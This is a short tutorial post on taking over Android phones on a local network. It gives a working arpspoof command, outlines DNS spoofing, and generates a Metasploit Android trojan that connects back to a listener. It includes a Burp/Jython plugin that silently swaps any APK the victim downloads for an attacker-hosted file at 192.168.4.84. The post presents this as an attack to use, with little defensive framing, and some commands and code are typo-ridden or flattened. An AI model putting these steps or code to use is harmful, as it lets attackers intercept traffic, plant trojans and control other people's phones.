Mobile phone Control for Intranet penetration
I have been studying the methods from wifi cracking to pc and mobile phone Control recently. I want to share with you how to download and replace apk on a mobile phone!
(1) Environment:
Target machine: 192.168.247.130
Penetration machine kali: 192.168.247.129
Gateway: 192.168.247.2
(2) Tools used: 1. arpspoof
2. dnsspoof
3. burp
4. jython-burp-api (kali is not integrated and needs to be installed separately. For details, see:
Https://github.com/mwielgoszewski/jython-burp-api)
(3) steps:
1. Use arpspoof to send arp spoofing packets;
arpspoof -i eth0 -t 192.168.247.130 192.168.247.2
2. Use dnsspoof for dns Spoofing;
3. Use msf to generate an android Trojan;
4. msf listens and waits for the Trojan to rebound;
5. Write a python script for apk download redirection. The Code is as follows. Note: save this code to the Lib target under jython-burp-api and name it testplugin. py;
from gds.burp.api import IProxyRequestHandler from gds.burp.core import Component, implements class ExamplePlugin(Component): implements(IProxyRequestHandler) def processRequest(self, request): if ".apk" in request.url.geturl(): print "apk download detected, redirecting" request.host = "192.168.4.84" request.raw = ("GET /1.apk HTTP/1.1\r\n" + "HOST: 192.168.4.84\r\n\r\n")
6. Edit the configuration file burp. ini in jython-burp-api;
7. Start the burp command: java-Xmx1g-jar burpsutie. jar
8. Set burp
9. Load jython in burp
10. When the target starts to download the apk, It will be replaced with the specified apk for download.
11. The jython console in burp is as follows:
12. When the target installs and runs the downloaded apk, msf returns a Bounce Message;